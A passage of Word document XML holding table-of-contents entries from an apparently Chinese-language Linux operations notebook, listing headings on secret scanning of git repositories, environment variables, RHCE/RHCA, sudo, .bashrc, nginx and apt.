          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DAFB242" w14:textId="005C8977" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779646" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SecretDetect</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>批量扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>git</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>仓库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779646 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>140</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48565396" w14:textId="3E2B2A68" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779647" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>导入环境变量：例</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>使用密码则使用环境变量</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779647 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>140</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32D17184" w14:textId="546266D4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779648" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>RHCE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779648 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>141</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27FCAE7F" w14:textId="105D1456" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779649" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>RHCA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779649 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>152</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23BEF3F0" w14:textId="7FB514CD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779650" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>运维</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779650 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>152</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FA101B2" w14:textId="5567A7CD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779651" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>守护进程（</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>daemon</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779651 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>152</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0ECAFCC2" w14:textId="38EFB2BF" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779652" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>新建用户没有</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779652 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>153</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C4F51F4" w14:textId="13946CAD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779653" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>打印环境变量：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>printenv,env</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779653 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>154</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A07CF50" w14:textId="40173E56" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779654" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>.bashrc:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>用户登录初始会加载更改环境变量的脚本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779654 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>154</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08A90975" w14:textId="23EC66BA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779655" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>nginx</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>运维</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779655 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>154</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57DC755D" w14:textId="6685210E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779656" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>nginx</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装及配置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779656 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>154</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F8F62E7" w14:textId="3EE596A9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779657" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>源</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779657 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>156</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AD203E4" w14:textId="71E29C73" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779658" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>工作原理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779658 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>156</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65EC4912" w14:textId="6A4FC3FD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779659" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">export </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> source</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779659 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>160</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34BC327F" w14:textId="3B204D8B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779660" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>export</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779660 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>160</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32EA0EC0" w14:textId="72A877E1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779661" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mod</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779661 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>161</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5844A2B5" w14:textId="795F3053" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779662" w:history="1">
